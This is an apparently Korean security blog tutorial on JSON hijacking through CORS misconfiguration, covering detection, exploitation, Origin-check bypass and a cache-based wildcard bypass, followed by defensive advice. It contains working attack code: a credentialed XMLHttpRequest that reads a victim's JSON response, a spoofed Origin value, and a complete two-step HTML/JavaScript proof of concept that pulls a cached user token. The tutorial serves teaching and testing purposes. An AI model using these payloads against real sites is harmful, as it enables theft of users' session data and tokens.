JSON Hijacking

🔍 Introduction

JSON Hijacking은 SOP의 예외를 위한 CORS 설정이 미흡한 경우 공격자가 사용자의 데이터 등을 임의로 탈취할 수 있는 공격 방법입니다.

🗡 Offensive techniques

Detect

공격자가 의도한 도메인을 Origin 헤더로 전송하여 ACAO 헤더(Access-Control-Allow-Origin)에 반영된다면 취약 하다고 판단할 수 있습니다. 일부 Wildcard(*)로 ACAO 헤더가 오는 경우가 있는데, 이러한 경우 모든 도메인에서 호출할 수 있지만, Access-Control-Allow-Credentials와 별개로 사용자의 쿠키를 붙여서 전송할 수 없게 됩니다. 자세한 내용은 이전 포스트를 참고해주세요.

GET /get-info.json HTTP/1.1
Origin: https://www.hahwul.com

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/json
Content-Length: 223
Connection: keep-alive
Last-Modified: Fri, 03 Sep 2021 01:43:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Access-Control-Allow-Origin: https://www.hahwul.com
Access-Control-Allow-Credentials: true
Vary: Origin

Exploitation

ACAO에 공격자가 의도한 도메인을 반영할 수 있다면 해당 도메인에선 사용자의 세션을 이용하여 데이터를 가져올 수 있다는 것을 의미합니다.

var http = new XMLHttpRequest();
http.open("GET", "https://weak-service/get-info.json", true);

http.setRequestHeader("Content-Type","application/json");
http.withCredentials = true;
http.onreadystatechange = function() {
    if(http.readyState == 4 && http.status == 200) {
        console.info(http.status);
        console.info(http.responseText);
        document.write("Responsed data<hr>"+http.responseText);
    } else {
        document.write("Error");
    }
}
http.send();

Bypass protection

Bypass Origin

Origin 헤더에 대해 검증하는 절차가 있는 경우 어떤 형태로 검증 하는지 파악해야합니다. 정확하게 도메인을 식별한다면 우회가 어렵겠지만, 문자열 또는 정규식 기반으로 식별하는 경우 우회할 가능성이 높습니다.

Origin: trust.domain.attacker.domain

Origin의 경우 Referer 헤더와 다르게 Path가 붙지 않기 때문에 도메인을 이용한 우회 방법이 최선입니다.

Bypass with Caching

ACAO가 Wildcard(*)인 상태는 일반적으로 유저 세션을 사용할 수 없어 JSON Hijacking이 불가능하지만, 만약 JSON Response 페이지의 Cache-Control로 인해 로컬 캐싱되는 경우 SOP를 우회하여 정보를 가져올 수 있습니다.

Access-Control-Allow-Origin: *

Cached 데이터를 읽는 과정은 실제 서버로 데이터를 요청하지 않고 브라우저 내에 저장된 데이터를 바로 읽어 사용자에게 제공합니다. 이걸 이용하여 공격자가 중요 정보가 있는 페이지를 사용자의 세션으로 캐싱시킨 후 ACAO가 Wildcard인 상태에서 이미 캐시된 결과를 읽어오는 형태로 SOP를 통과할 수 있습니다. (왜냐면 Origin 정책이 wildcard 일 때 인증을 포함하지 않는 요청은 response를 읽을 수 있기 때문이죠 😁)

예를들어 인증 상태에서만 사용자 정보를 내려주는 페이지가 있다고 가정합시다.

With Auth

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=3600
...

{"username":"hahwul","token":"ABCDEFG123456"}

Without Auth

HTTP/1.1 403 FORBIDDEN
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=3600
...

이 때 ACAO가 * 인 상태에서 CSRF와 같이 SOP의 영향을 받지 않는 요청(img, form, etc…)을 통해 HTTP Request를 전송합니다.

<img src="https://vuln.hahwul.com/get-token">

그러면 아래와 같이 사용자 정보를 포함한 요청이 Response로 전달됩니다. 당연히 공격코드는 이를 읽을 수 없습니다. 단 response 내 cache-control로 인해 해당 데이터는 사용자의 브라우저에 캐시됩니다.

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Cache-Control: private, max-age=3600

{"username":"hahwul","token":"ABCDEFG123456"}

이제 withCredentials를 false로 주고 $.ajax를 통해 HTTP Request를 전송해봅시다. ACAO가 *이기 떄문에 이 코드는 Response의 데이터를 핸들링할 수 있습니다. 다만 사용자의 쿠키정보는 웹 요청에 포함되지 않습니다.

$.ajax({
      url: "https://vuln.hahwul.com/get-token",
      type: "get",
      xhrFields: {
        withCredentials: false
      },
      headers: {
          "Accept":"application/json",
          "Accept-Language":"ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3",
      },
      success: function (data) {
          console.info(data);
      }
  });

이 때 웹 브라우저는 캐시된 데이터를 읽어오기 때문에 body에 아래 정보가 포함되어 response로 전달됩니다.

{"username":"hahwul","token":"ABCDEFG123456"}

그러면 공격자는 SOP를 무시하고 사용자의 정보를 탈취할 수 있습니다. 전체 공격 플로우를 담은 코드는 아래와 같고, 자세한 내용은 예전에 작성한 글을 참고해주세요 :D

<!-- Step1, Caching with Auth -->
<script>  
var url = "https://vuln.hahwul.com/get-token";  
fetch(url, {    
    method: 'GET',    
    cache: 'force-cache'
    });
</script>
<!-- Sometimes, it is convenient to use the img tag when it is cached by default. -->
<!-- <img src="https://vuln.hahwul.com/get-token"> -->

<!-- Step2, Get Userdata without Auth(Using cache)-->
<script>
//delay for cached
setTimeout(function (){
  // get information without auth
  $.ajax({
      url: "https://vuln.hahwul.com/get-token",
      type: "get",
      xhrFields: {
        withCredentials: false
      },
      headers: {
          "Accept":"application/json",
          "Accept-Language":"ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3",
      },
      success: function (data) {
          console.info(data);
      }
  });
}, 2000);
</script>

🛡 Defensive techniques

CORS 사용이 필요한 페이지에선 ACAO 헤더에 대해 도메인을 정확하게 내려주는 것이 좋습니다. 만약 로컬에서만 호출되는 페이지라면 ACAO 헤더 자체를 사용하지 않는 것이 가장 좋습니다.

또한 민감정보의 경우 Response 내 cache-control을 적절히 설정하여 (no-cache 등) 데이터가 로컬 브라우저에 파일로 캐시되지 않도록 처리해주는 것이 좋습니다. (특히 ACAO *을 허용하는 경우)